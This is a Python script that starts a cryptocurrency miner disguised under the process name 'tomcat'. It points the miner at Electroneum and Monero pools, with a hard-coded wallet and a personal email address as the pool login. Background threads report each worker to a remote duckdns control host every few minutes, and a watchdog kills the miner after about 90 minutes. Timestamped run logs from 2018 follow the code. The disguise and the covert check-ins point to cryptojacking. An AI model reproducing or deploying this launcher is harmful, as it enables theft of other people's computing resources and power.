import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:04.215552
#2018-02-17 17:01:01.634645
#2018-02-17 18:48:08.030700
#2018-02-17 20:38:01.631683
#2018-02-17 22:24:01.755915
#2018-02-18 00:08:04.136370
#2018-02-18 01:59:01.751452
#2018-02-18 03:46:08.322752
#2018-02-18 05:34:05.452039
#2018-02-18 07:27:03.948538
#2018-02-18 09:14:05.885772
#2018-02-18 11:01:06.240860
#2018-02-18 12:47:04.208212
#2018-02-18 14:32:03.859995
#2018-02-18 16:22:07.043294
#2018-02-18 18:11:07.139221
#2018-02-18 19:57:04.311381
#2018-02-18 21:43:01.696838
#2018-02-18 23:32:03.458410
#2018-02-19 01:18:01.260446
#2018-02-19 03:06:04.045491
#2018-02-19 04:52:04.167352
#2018-02-19 06:36:07.538688
#2018-02-19 08:26:01.742658
#2018-02-19 10:15:06.486226
#2018-02-19 12:04:07.590303
#2018-02-19 13:51:01.542966
#2018-02-19 15:41:04.184876
#2018-02-19 17:27:06.526377
#2018-02-19 19:15:10.717670
#2018-02-19 21:04:06.749149
#2018-02-19 22:52:05.828064
#2018-02-20 00:36:01.353914
#2018-02-20 02:24:08.558224
#2018-02-20 04:15:07.403976
#2018-02-20 05:59:04.094430
#2018-02-20 07:45:07.987127
#2018-02-20 09:32:01.720243
#2018-02-20 11:16:05.786147
#2018-02-20 13:03:05.818199
#2018-02-20 14:48:01.951328
#2018-02-20 16:28:04.158784
#2018-02-20 18:16:10.000829
#2018-02-20 20:07:08.761142
#2018-02-20 21:54:03.467636
#2018-02-20 23:35:01.640427
#2018-02-21 01:19:07.280975
#2018-02-21 03:08:01.771014
#2018-02-21 04:56:05.129689
#2018-02-21 06:44:05.289039
#2018-02-21 08:32:04.376082
#2018-02-21 10:17:04.703723
#2018-02-21 12:05:01.359274
#2018-02-21 13:54:01.654546
#2018-02-21 15:40:10.083088
#2018-02-21 17:31:09.326727
#2018-02-21 19:18:17.464446
#2018-02-21 21:06:03.770351
#2018-02-21 22:54:01.760547
#2018-02-22 00:42:09.206789
#2018-02-22 02:31:08.015314
#2018-02-22 04:17:06.264083
#2018-02-22 06:56:05.580173
#2018-02-22 08:43:07.848304
#2018-02-22 10:31:04.986439
#2018-02-22 12:17:06.312889
#2018-02-22 14:01:01.821938
#2018-02-22 15:49:18.819108
#2018-02-22 17:38:01.728169
#2018-02-22 19:26:04.664621
#2018-02-22 21:19:04.111566
#2018-02-22 23:06:04.917791
#2018-02-23 00:52:05.760904
#2018-02-23 02:40:10.027009
#2018-02-23 04:29:01.636229
#2018-02-23 06:15:04.089663
#2018-02-23 08:02:04.648679
#2018-02-23 10:16:01.328316
#2018-02-23 12:09:09.281472
#2018-02-23 13:56:06.385032
#2018-02-23 15:47:12.919135
#2018-02-23 17:33:08.599820
#2018-02-23 19:21:04.036390
#2018-02-23 21:04:05.699786
#2018-02-23 22:48:06.744582
#2018-02-24 00:36:08.495387
#2018-02-24 02:26:05.949994
#2018-02-24 04:16:06.480050
#2018-02-24 06:04:04.172073
#2018-02-24 07:52:03.728192
#2018-02-24 09:36:05.605054
#2018-02-24 11:31:05.442083
#2018-02-24 13:21:05.572405
#2018-02-24 15:11:06.469632
#2018-02-24 16:59:03.868687
#2018-02-24 18:47:06.904647
#2018-02-24 20:37:06.858943
#2018-02-24 22:43:05.122308
#2018-02-25 02:05:01.345338
#2018-02-25 05:33:03.597844
#2018-02-25 11:34:07.910331